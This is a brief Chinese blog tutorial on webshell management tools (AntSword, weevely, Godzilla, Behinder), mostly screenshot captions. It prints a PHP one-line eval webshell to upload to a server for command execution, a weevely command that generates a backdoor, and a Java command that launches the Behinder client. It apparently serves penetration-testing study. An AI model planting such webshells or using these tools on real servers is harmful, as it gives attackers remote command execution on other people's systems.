web安全之Webshell管理工具

目录

漏洞原理

工具

中国蚁剑(antsword)

weevely(kali)

godzilla

Behinder


 

漏洞原理

上传PHP一句话木马到服务器

";
	@eval($_POST['coleak']); 
?>

找到上传路径后通过给coleak赋值执行系统命令

web安全之Webshell管理工具_第1张图片

web安全之Webshell管理工具_第2张图片

工具

中国蚁剑(antsword)

web安全之Webshell管理工具_第3张图片

74d673b559744e0a904002a665ae4f1b.png

weevely(kali)

web安全之Webshell管理工具_第4张图片

 weevely generate coleak weevely.php

web安全之Webshell管理工具_第5张图片

79512070ee2f4b02a5a55f1e32d147d0.png

godzilla

web安全之Webshell管理工具_第6张图片

 上传到文件目录内

85e03346396f44c68e728e9f3215cb60.png

 测试连接

 web安全之Webshell管理工具_第7张图片

web安全之Webshell管理工具_第8张图片

web安全之Webshell管理工具_第9张图片

Behinder

web安全之Webshell管理工具_第10张图片 

3d9364179b7b4e798b4e550a069d5536.png

注:Behinder可能存在脚本无法打开的情况

原因:冰蝎beta7版本客户端不再内置javafx库,java11以后版本移除了JavaFX库,要运行冰蝎需要自己下载JavaFX库

JavaFX - Gluon (gluonhq.com)

start javaw --module-path "D:\openjfx-18.0.2_windows-x64_bin-sdk\javafx-sdk-18.0.2\lib" --add-modules=javafx.base --add-modules=javafx.controls  --add-modules=javafx.fxml  --add-modules=javafx.graphics  --add-modules=javafx.media  --add-modules=javafx.swing  --add-modules=javafx.web -jar Behinder.jar 

修改好下载的lib库,执行上面代码即可启动 

 

你可能感兴趣的:(web安全,web安全,安全)